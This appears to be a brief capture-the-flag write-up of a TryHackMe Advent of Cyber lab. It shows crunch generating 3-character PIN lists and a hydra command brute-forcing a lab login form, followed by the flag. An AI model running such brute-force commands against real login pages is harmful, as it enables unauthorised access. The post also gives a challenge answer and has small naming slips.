Post

Advent of Cyber Day 3

The advent of cyber is a set of daily challenges set up by THM and various industy experts. This is a great way to stay fresh on learned material and learn something new. The second day is focused on brute forcing using Hydra and Crunch

Learning Objectives

  • Password complexity and the number of possible combinations
  • How the number of possible combinations affects the feasibility of brute force attacks
  • Generating password combinations using crunch
  • Trying out passwords automatically using hydra

Writeup

Using crunch and hydra, find the PIN code to access the control system and unlock the door. What is the flag?

1
2
3
crunch 3 3 0123456789ABCDEF -o 3digit.txt

hydra -l '' -P 3digits.txt -f -v 10.10.18.129 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Solution 6F5
This post is licensed under CC BY 4.0 by the author.